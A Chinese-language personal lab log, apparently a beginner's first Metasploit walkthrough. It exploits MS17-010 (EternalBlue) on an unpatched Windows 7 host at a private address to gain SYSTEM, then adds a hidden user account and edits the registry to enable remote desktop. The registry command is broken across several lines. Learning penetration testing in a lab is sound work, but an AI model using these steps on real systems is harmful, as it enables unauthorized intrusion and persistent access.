2019-9-27:渗透测试,metasploit-framework初接触
初次利用metasploit漏洞利用框架,入侵获取win7获取权限
目标机系统:windows7,无修复补丁
目标ip地址:192.168.20.131
任务:利用ms17-010,永恒之蓝漏洞,获取目标系统控制权
1,使用metasploit前,需要开启Postgresql数据库,输入命令service Postgresql start开启服务
2,输入命令msfconsole,启动metasploit,终端界面出现msf5就是启动完成
3,首先确定利用插件目录,输入命令search ms17-010,确定扫描插件目录以便使用
可以看到,
auxiliary/scanner/smb/smb_ms17_010, 这个是扫描ms17-010确定是否有该漏洞的脚本所在目录
exploit/windows/smb/ms17_010_eternalblue ,这个是漏洞利用脚本所在目录
4,利用目录都确定之后,开始正式使用,输入use auxiliary/scanner/smb/smb_ms17_010 ,进入扫描目录
5,进入扫描目录之后,可以show options,查看扫描所需要设置的参数
6,设置参数,输入命令,set rhosts 192.168.20.131,确定扫描主机
7,输入exploit,确定目标主机存在可利用漏洞
8,既然确定可以利用了,那就不客气的搞起了,输入use exploit/windows/smb/ms17_010_eternalblue,进入ms17-010漏洞利用脚本下,set rhosts 192.168.20.131,设置好攻击主机
9,运行exploit,启动攻击,成功拿下,并直接获取了system权限
10,拿下shell之后,当然可以为所欲为,
net user $用户名 /add, 添加一个隐藏用户
net user $用户名 密码,设置隐藏用户的密码
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal
" "
Server
/v
fDenyTSConnections
/t
REG_DWORD
/d
00000000
/f,开启3389端口
11,总结
metasploit-framework不愧是做网络渗透测试的必备工具,提供了非常多的常用漏洞利用脚本方便测试人员使用,极大的节省了测试人员时间,是极好的,渗透测试人员要务必精通
完